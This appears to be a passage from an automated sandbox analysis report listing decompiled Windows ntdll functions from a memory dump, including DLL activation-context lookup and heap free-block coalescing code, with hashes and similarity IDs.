                                      • Opcode Fuzzy Hash: 5bb61741ac78f2a1c7931aaec704cf50fb95d0b4e7e27a06ecd050bf4c8342e4
                                      • Instruction Fuzzy Hash: 5F51F5322146819FE722DB6CC848F6B7BE8FF84B50F1908A8F559CB291D775D940CB61
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019A8E00, Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                                      Download Yara Rule
                                      C-Code - Quality: 44%
                                      			E019A8E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x1a6d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1a68464; // 0x74b10110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1a65780 & 0x00000003) != 0) {
							E019F5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1a65780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E019BB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1a67984; // 0x1512b08
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1a68464; // 0x74b10110
					 *0x1a6b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E019A9B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1a65780 & 0x00000005) != 0) {
						_push(_t49);
						E019F5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                                      0x019a8e0f
                                      0x019a8e16
                                      0x019a8e19
                                      0x019a8e1b
                                      0x019a8e21
                                      0x019a8e7f
                                      0x019a8e85
                                      0x019e9354
                                      0x019e936c
                                      0x019e9371
                                      0x019e937b
                                      0x019e9381
                                      0x019e9381
                                      0x019e937b
                                      0x019a8e9d
                                      0x019a8e9d
                                      0x019a8e29
                                      0x019a8e2c
                                      0x019a8e38
                                      0x019a8e3e
                                      0x019a8e43
                                      0x019a8eb5
                                      0x019a8eb9
                                      0x019e92aa
                                      0x019e92af
                                      0x019e92e8
                                      0x019e92e8
                                      0x019e92af
                                      0x019a8eb9
                                      0x019a8e45
                                      0x019a8e53
                                      0x019a8e5b
                                      0x019a8e5f
                                      0x019a8e78
                                      0x019a8e78
                                      0x019a8e7d
                                      0x019a8ec3
                                      0x019a8ecd
                                      0x019a8ed2
                                      0x019a8ed2
                                      0x019a8ec5
                                      0x019a8ec5
                                      0x00000000
                                      0x019a8e7d
                                      0x019a8e67
                                      0x019a8ea4
                                      0x019e931a
                                      0x00000000
                                      0x00000000
                                      0x019e9320
                                      0x019a8ea4
                                      0x019a8e70
                                      0x019e9325
                                      0x019e9340
                                      0x019e9345
                                      0x019e9345
                                      0x019a8e76
                                      0x00000000
                                      0x00000000
                                      0x00000000
                                      0x00000000

                                      Strings
                                      • LdrpFindDllActivationContext, xrefs: 019E9331, 019E935D
                                      • minkernel\ntdll\ldrsnap.c, xrefs: 019E933B, 019E9367
                                      • Querying the active activation context failed with status 0x%08lx, xrefs: 019E9357
                                      • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 019E932A
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID:
                                      • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                      • API String ID: 0-3779518884
                                      • Opcode ID: 90240b48e826383986b598fa2da6ebaecd413e5be8b014aaf9ce9c0e9a6f002c
                                      • Instruction ID: 9b7d832e2c00311d06369bdf1d4fb87402f3a144486dbcc1950975bb2b6cf112
                                      • Opcode Fuzzy Hash: 90240b48e826383986b598fa2da6ebaecd413e5be8b014aaf9ce9c0e9a6f002c
                                      • Instruction Fuzzy Hash: 40410772A00315DEEF36BB1CC84CA76B7A8AB4025BFA64569EB0C97151E7747D8883C1
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 01A349A4, Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000011.00000002.362929361.0000000001950000.00000040.00000001.sdmp, Offset: 01950000, based on PE: true
                                      Similarity
                                      • API ID: InitializeThunk
                                      • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                      • API String ID: 2994545307-336120773
                                      • Opcode ID: 18ffac304da2a612834211e7364ee7d9abb8a27e66b842b021450ef57a2c764c
                                      • Instruction ID: 9de6c02db08d98860d26b68efb31aa5f781e7cb1f556aadfc0f7499a89f36174
                                      • Opcode Fuzzy Hash: 18ffac304da2a612834211e7364ee7d9abb8a27e66b842b021450ef57a2c764c
                                      • Instruction Fuzzy Hash: 1F312835A00204EFD721DF5DD885F6BB7E8FF88720F184069F90ADB251E671A881CB69
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 019999BF, Relevance: 4.3, Strings: 3, Instructions: 572COMMONCrypto
                                      Download Yara Rule
                                      C-Code - Quality: 78%
                                      			E019999BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E01A2FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E01A3A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E019CD540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E0197B150();
										} else {
											E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E0197B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x1a66378 = 1;
											asm("int3");
											 *0x1a66378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E0199A229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E0199A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E0199BC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E01A3A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E0199A229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E0199A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E019CD540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E0197B150();
								} else {
									E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E0197B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x1a66378 = 1;
									asm("int3");
									 *0x1a66378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E01A2FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E01A3A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E019CD540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E0197B150();
													} else {
														E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E0197B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x1a66378 = 1;
														asm("int3");
														 *0x1a66378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E0199A229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E0199A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E0199BC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E01A3A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E019CD540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E0197B150();
													} else {
														E0197B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E0197B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x1a66378 = 1;
														asm("int3");
														 *0x1a66378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E0199A229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E0199A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E0199BC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E0199BC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}




















































































                                      0x019999ca
                                      0x019999cc
                                      0x019999df
                                      0x019999e3
                                      0x019999f8
                                      0x019999fb
                                      0x019999fb
                                      0x00000000
                                      0x01999a48
                                      0x01999a48
                                      0x01999a4c
                                      0x01999a51
                                      0x01999a55
                                      0x01999a61
                                      0x01999a66
                                      0x01999a68
                                      0x019e1457
                                      0x019e145c
                                      0x019e145c
                                      0x01999a68
                                      0x01999a6e
                                      0x01999a71
                                      0x01999a74
                                      0x01999a76
                                      0x019e1466
                                      0x019e1469
                                      0x019e1469
                                      0x019e146c
                                      0x019e146e
                                      0x019e1471
                                      0x019e1474
                                      0x019e1477
                                      0x019e1479
                                      0x019e159c
                                      0x019e159c
                                      0x019e159d
                                      0x019e15a6
                                      0x019e15ab
                                      0x019e15ab
                                      0x00000000
                                      0x019e15ab
                                      0x019e147f
                                      0x019e1481
                                      0x00000000
                                      0x00000000
                                      0x019e148a
                                      0x019e148d
                                      0x019e1493
                                      0x019e1495
                                      0x019e14c0
                                      0x019e14c0
                                      0x019e14c3
                                      0x019e14c6
                                      0x019e14c8
                                      0x019e14cb
                                      0x019e14cf
                                      0x019e14f2
                                      0x019e14f2
                                      0x019e14f5
                                      0x019e14f8
                                      0x019e1501
                                      0x019e1508
                                      0x019e150b
                                      0x019e150e
                                      0x019e1510
                                      0x019e1513
                                      0x019e1515
                                      0x019e1515
                                      0x019e1518
                                      0x019e1518
                                      0x019e1513
                                      0x019e1521
                                      0x019e1525
                                      0x019e152a
                                      0x019e152d
                                      0x019e1530
                                      0x019e1532
                                      0x019e1539
                                      0x019e153d
                                      0x019e155d
                                      0x019e1562
                                      0x019e153f
                                      0x019e1555
                                      0x019e155a
                                      0x019e1570
                                      0x019e1577
                                      0x019e157c
                                      0x019e1582
                                      0x019e1585
                                      0x019e1589
                                      0x019e158b
                                      0x019e1592
                                      0x019e1593
                                      0x019e1593
                                      0x019e1589
                                      0x019e1530
                                      0x00000000
                                      0x019e14f8
                                      0x019e14d5
                                      0x019e14da
                                      0x019e14dc
                                      0x00000000
                                      0x019e14de
                                      0x019e14e8
                                      0x00000000
                                      0x019e14e8
                                      0x019e1497
                                      0x019e1497
                                      0x019e14a4
                                      0x019e14a4
                                      0x019e14a7
                                      0x019e14a9
                                      0x019e14ab
                                      0x019e14ab
                                      0x019e149c
                                      0x019e149e
                                      0x019e14a0
                                      0x019e14b0
                                      0x019e14b0
                                      0x00000000
                                      0x019e14a2
                                      0x019e14a2
                                      0x00000000
                                      0x019e14a2
                                      0x019e14a0
                                      0x019e14b3
                                      0x019e14bb
                                      0x00000000
                                      0x019e14bb
                                      0x019e1495
                                      0x01999a7c
                                      0x01999a7c
                                      0x01999a7f
                                      0x01999a7f
                                      0x01999a82
                                      0x01999a84
                                      0x01999a87
                                      0x01999a8a
                                      0x01999a8d
                                      0x01999a8f
                                      0x019e166a
                                      0x019e166a
                                      0x019e166b
                                      0x019e1674
                                      0x00000000
                                      0x019e1674
                                      0x01999a95
                                      0x01999a97
                                      0x00000000
                                      0x00000000
                                      0x01999aa0
                                      0x01999aa3
                                      0x01999aa9
                                      0x01999aab
                                      0x01999ad7
                                      0x01999ad7
                                      0x01999ada
                                      0x01999add
                                      0x01999adf
                                      0x01999ae2
                                      0x01999ae6
                                      0x01999b22
                                      0x01999b27
                                      0x01999b29
                                      0x00000000
                                      0x01999b2b
                                      0x019e15be
                                      0x00000000
                                      0x019e15be
                                      0x01999b29
                                      0x01999ae8
                                      0x01999ae8
                                      0x01999aeb
                                      0x01999aee
                                      0x019e15cb
                                      0x019e15d2
                                      0x019e15d5
                                      0x019e15d7
                                      0x019e15da
                                      0x019e15dc
                                      0x019e15dc
                                      0x019e15dc
                                      0x019e15da
                                      0x019e15e5
                                      0x019e15e9
                                      0x019e15ee
                                      0x019e15f1
                                      0x019e15f3
                                      0x019e15f9
                                      0x019e1600
                                      0x019e1604
                                      0x019e1624
                                      0x019e1629
                                      0x019e1606
                                      0x019e161c
                                      0x019e1621
                                      0x019e1637
                                      0x019e163e
                                      0x019e1643
                                      0x019e1649
                                      0x019e164c
                                      0x019e1650
                                      0x019e1656
                                      0x019e165d
                                      0x019e165e
                                      0x019e165e
                                      0x019e1650
                                      0x019e15f3
                                      0x01999af4
                                      0x01999af7
                                      0x01999afc
                                      0x01999b00
                                      0x01999b04
                                      0x01999b08
                                      0x01999b14
                                      0x019999fe
                                      0x01999a04
                                      0x01999a07
                                      0x00000000
                                      0x01999a29
                                      0x019e169c
                                      0x019e16a0
                                      0x019e16a5
                                      0x019e16a9
                                      0x019e16b5
                                      0x019e16ba
                                      0x019e16bc
                                      0x019e16be
                                      0x019e16c3
                                      0x019e16c3
                                      0x019e16bc
                                      0x019e16c8
                                      0x019e16cc
                                      0x019e181b
                                      0x019e181b
                                      0x019e181e
                                      0x019e181e
                                      0x019e1821
                                      0x019e1823
                                      0x019e1826
                                      0x019e1829
                                      0x019e182c
                                      0x019e182e
                                      0x019e1688
                                      0x019e1688
                                      0x019e1689
                                      0x019e168b
                                      0x019e168c
                                      0x019e168d
                                      0x019e168f
                                      0x019e1692
                                      0x00000000
                                      0x019e1692
                                      0x019e1834
                                      0x019e1836
                                      0x00000000
                                      0x00000000
                                      0x019e183f
                                      0x019e1842
                                      0x019e1848
                                      0x019e184a
                                      0x019e1875
                                      0x019e1875
                                      0x019e1878
                                      0x019e187b
                                      0x019e187d
                                      0x019e1880
                                      0x019e1884
                                      0x019e18a7
                                      0x019e18a7
                                      0x019e18aa
                                      0x019e18ad
                                      0x019e18b6
                                      0x019e18bd
                                      0x019e18c0
                                      0x019e18c3
                                      0x019e18c5
                                      0x019e18c8
                                      0x019e18ca
                                      0x019e18ca
                                      0x019e18cd
                                      0x019e18cd
                                      0x019e18c8
                                      0x019e18d5
                                      0x019e18da
                                      0x019e18df
                                      0x019e18e2
                                      0x019e18e5
                                      0x019e18e7
                                      0x019e18ee
                                      0x019e18f2
                                      0x019e1912
                                      0x019e1917
                                      0x019e18f4
                                      0x019e190a
                                      0x019e190f
                                      0x019e1925
                                      0x019e192c
                                      0x019e1931
                                      0x019e193a
                                      0x019e193e
                                      0x019e1940
                                      0x019e1947
                                      0x019e1948
                                      0x019e1948
                                      0x019e193e
                                      0x019e18e5
                                      0x019e194f
                                      0x019e1952
                                      0x019e1956
                                      0x019e195d
                                      0x019e1961
                                      0x019e196d
                                      0x00000000
                                      0x019e196d
                                      0x019e188a
                                      0x019e188f
                                      0x019e1891
                                      0x00000000
                                      0x00000000
                                      0x019e189d
                                      0x00000000
                                      0x019e189d
